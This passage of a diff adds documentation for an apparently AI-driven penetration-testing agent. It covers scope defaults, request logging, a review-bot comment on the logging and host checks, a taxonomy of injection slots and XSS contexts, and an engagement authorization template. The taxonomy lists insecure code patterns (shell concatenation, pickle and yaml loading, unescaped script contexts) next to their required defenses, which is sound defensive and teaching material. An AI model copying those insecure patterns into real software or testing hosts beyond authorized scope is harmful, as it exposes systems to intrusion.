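+providers, S3 buckets — even if your tests would touch them, they
+are NOT in scope by default.
+
+## When Scope Fails Open
+
+If you can't decide whether a host is in scope:
+
+```
+DEFAULT: out of scope.
+```
+
+Stop the agent. Ask the operator. Resume only after written
+confirmation. There is no penalty for asking; there is significant
+penalty for testing the wrong host.
+
+## Logging
+
+Every active request should append to `engagement/request-log.jsonl`:
+
+```json
+{"ts": "2026-05-25T03:14:15Z", "method": "GET", "url": "https://staging.example.com/api/users", "host": "staging.example.com", "in_scope": true, "phase": "recon", "result_status": 200, "evidence_ref": "evidence/recon.md#endpoints"}
+```
+
+This is your audit trail. If anyone ever asks "why did the pentest
+agent hit X?" you can answer from this log.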
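Review bot: The request-log record in the Logging section captures neither the address the host resolved to nor the requests the pre-send check refused, even though the CNAMEs bullet makes the resolved IP part of the scope decision and the stated purpose of the log is answering "why did the agent hit X?". Add a `"resolved_ip": "..."` field and require an `"in_scope": false` entry with `"result_status": null` whenever a request is blocked, so refusals are auditable alongside sends. The host-extraction recipe `urllib.parse.urlparse(url).hostname.lower()` also raises on schemeless input such as `staging.example.com/login`, because `hostname` is `None` there; state explicitly that a `None` host is treated as out of scope rather than allowed to crash the check. Finally, the name-to-IP resolution done for the check and the one curl performs at connect time can differ (bypass-techniques.md itself lists DNS rebinding), so the check should be repeated immediately before the send or the vetted IP pinned by the harness, not by agent-supplied `--resolve`.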
@@ -0,0 +1,81 @@
1
+ # Vulnerability Taxonomy
2
+
3
+ Two classification systems used during analysis. Both come from Shannon
4
+ (concepts only; rewritten here). Both exist to make the question
5
+ "is this exploitable?" mechanical instead of vibes-based.
6
+
7
+ ## Injection: Slot Types
8
+
9
+ Every injection sink has a **slot type** — the lexical position the
10
+ attacker payload lands in. Each slot type has a small set of
11
+ **required defenses**. A mismatch is a vulnerability. The same defense
12
+ applied to the wrong slot is also a vulnerability.
13
+
14
+ | Slot | Example | Required defense |
15
+ |------|---------|------------------|
16
+ | `SQL-val` | `SELECT * FROM u WHERE id = :v` | Parameterized binding |
17
+ | `SQL-ident` | `SELECT * FROM ${table}` | Allowlist on identifier values |
18
+ | `SQL-keyword` | `ORDER BY ${col} ${dir}` | Allowlist on column AND direction |
19
+ | `CMD-argument` | `subprocess.run(["ls", v])` | argv list (never shell=True) |
20
+ | `CMD-shell` | `os.system("ls " + v)` | DON'T — refactor to argv list |
21
+ | `PATH-segment` | `open("/data/" + v)` | Normalize + allowlist + base-relative check |
22
+ | `URL-host` | redirect to `https://${v}/x` | Allowlist of acceptable hosts |
23
+ | `URL-fetch` | `requests.get(v)` | Allowlist + block private/metadata IPs (SSRF) |
24
+ | `TEMPLATE-string` | `Template("Hello {{ v }}")` | Autoescape ON, no user-controlled template syntax |
25
+ | `DESERIALIZE-pickle` | `pickle.loads(v)` | DON'T — use JSON / msgpack |
26
+ | `DESERIALIZE-yaml` | `yaml.load(v)` | `yaml.safe_load`, never `yaml.load` |
27
+ | `XPATH-expr` | `tree.xpath("//u[@id='" + v + "']")` | Parameterized XPath or escape |
28
+ | `LDAP-filter` | `(uid=${v})` | LDAP filter escaping |
29
+ | `REGEX-pattern` | `re.search(v, text)` | Don't take pattern from user (ReDoS too) |
30
+ | `LOG-record` | `log.info("got " + v)` | Encode CR/LF/control chars before logging |
31
+ | `EMAIL-header` | `Subject: ${v}` | Reject CR/LF |
32
+ | `HTTP-header` | `Set-Cookie: ${v}` | Reject CR/LF (response splitting) |
33
+
34
+ When you classify a finding:
35
+ 1. Identify the slot type
36
+ 2. Identify the actual defense in the code (if you have source)
37
+ 3. If defense doesn't match the required-defense set: vulnerable
38
+
39
+ ## XSS: Render Contexts
40
+
41
+ XSS exploitability depends on **where** in the HTML/JS the value lands.
42
+ Encoding for one context doesn't protect another.
43
+
44
+ | Context | Example | Required encoding |
45
+ |---------|---------|-------------------|
46
+ | `HTML_BODY` | `<div>{{ v }}</div>` | HTML entity encode `<>&"'` |
47
+ | `HTML_ATTR_QUOTED` | `<a href="{{ v }}">` | HTML attr encode |
48
+ | `HTML_ATTR_UNQUOTED` | `<a href={{ v }}>` | Almost impossible to safely encode; quote the attr |
49
+ | `URL_ATTR` (href/src) | `<a href="{{ v }}">` | Validate scheme allowlist + attr encode |
50
+ | `JAVASCRIPT_STRING` | `<script>var x = "{{ v }}";</script>` | JS string escape + ensure quote consistency |
51
+ | `JAVASCRIPT_BLOCK` | `<script>{{ v }}</script>` | DON'T — refactor; no safe encoding |
52
+ | `CSS_VALUE` | `<style>color: {{ v }};</style>` | CSS encode + allowlist scheme/format |
53
+ | `CSS_BLOCK` | `<style>{{ v }}</style>` | DON'T — refactor |
54
+ | `JSON_RESPONSE` (consumed by JS) | `JSON.parse(response)` | JSON encode + correct content-type header |
55
+ | `EVENT_HANDLER` | `<div onclick="{{ v }}">` | JS string escape *inside* HTML attr encode |
56
+ | `URL_PATH` (router-driven) | route param echoed unencoded | URL-encode + HTML-encode |
57
+ | `DOM_INNERHTML` | `el.innerHTML = v` (DOM XSS) | Use `textContent` instead, or DOMPurify |
58
+ | `DOM_DOC_WRITE` | `document.write(v)` | DON'T — refactor |
59
+
60
+ When you classify:
61
+ 1. Identify the render context where user input lands
62
+ 2. Identify the encoding applied
63
+ 3. Mismatch = vulnerable. Even "HTML encoded" output in
64
+ `JAVASCRIPT_STRING` is exploitable (`</script><script>` evasion).
65
+
66
+ ## OWASP Top 10 (2021) Mapping
67
+
68
+ For reporting:
69
+
70
+ | OWASP | Slot/context covered |
71
+ |-------|----------------------|
72
+ | A01 Broken Access Control | authz class (IDOR, vertical/horizontal) |
73
+ | A02 Cryptographic Failures | infra class (weak TLS, plaintext storage) |
74
+ | A03 Injection | injection class (all slot types except deserialize) |
75
+ | A04 Insecure Design | reported in findings narrative |
76
+ | A05 Security Misconfiguration | infra class |
77
+ | A06 Vulnerable Components | infra class (whatweb output) |
78
+ | A07 Auth Failures | auth class |
79
+ | A08 Software/Data Integrity | DESERIALIZE-* slots, also supply chain |
80
+ | A09 Logging/Monitoring | infra class (out of scope for active testing) |
81
+ | A10 SSRF | ssrf class |
@@ -0,0 +1,69 @@
1
+ # Engagement Authorization
2
+
3
+ Fill out before any active testing. Save to `engagement/authorization.md`.
4
+
5
+ ---
6
+
7
+ **Engagement ID:** <UUID or short slug>
8
+ **Operator:** <name of the person driving this session>
9
+ **Date opened:** <ISO 8601 timestamp>
10
+ **Engagement window:** <start ISO timestamp> through <end ISO timestamp>
11
+
12
+ ## Target
13
+
14
+ - Primary URL(s):
15
+ - https://...
16
+ - Primary IP(s):
17
+ - X.X.X.X
18
+ - Hostnames covered:
19
+ - host.example.com
20
+ - api.host.example.com
21
+ - Networks covered (CIDR):
22
+ - 10.0.0.0/24 (internal lab)
23
+
24
+ ## Authorization Basis
25
+
26
+ (Pick one — record evidence in writing for anything but ownership.)
27
+
28
+ - [ ] Operator owns the application and infrastructure being tested.
29
+ - [ ] Written authorization from <name, role, organization, date>.
30
+ Document stored at: <path or link to signed authorization>.
31
+ - [ ]
32
+ as a self-test target. Operator confirms no other user is
33
+ connected to the dashboard instance during the engagement.
34
+
35
+ ## Out of Scope (must not be tested)
36
+
37
+ - Production systems unless explicitly listed above
38
+ - Third-party APIs / SaaS the application calls into
39
+ - Other tenants if the target is multi-tenant
40
+ - Cloud metadata endpoints (169.254.169.254, etc.) unless explicitly
41
+ included above
42
+ - Destructive payloads (DROP, DELETE, file writes outside test
43
+ directories) without per-payload approval
44
+ - Active social engineering, phishing, physical security
45
+
46
+ ## Constraints
47
+
48
+ - Rate limit: <N> req/s per host. Default 5/s (200ms gap).
49
+ - Hours: <none> | <only between HH:MM and HH:MM local>
50
+ - Notify-before for: <list of categories> e.g. "any payload that
51
+ writes data," "any traffic that touches the auth endpoint after
52
+ 10pm local"
53
+
54
+ ## Acknowledgement
55
+
56
+ By approving this engagement, the operator confirms:
57
+
58
+ 1. The targets listed above are authorized for active testing by the
59
+ listed authorization basis.
60
+ 2. Testing may produce HTTP 4xx/5xx responses, log noise, alert
61
+ notifications, and rate-limit triggers in monitoring systems.
62
+ 3. The operator is responsible for any consequences of testing
63
+ targets that are NOT correctly authorized.
64
+ 4. The operator will revoke authorization (by stopping the agent) if
65
+ the scope changes, the time window ends, or any unexpected
66
+ off-scope behavior is observed.
67
+
68
+ **Operator signature (typed name):** ________________
69
+ **Confirmed at:** <ISO 8601 timestamp>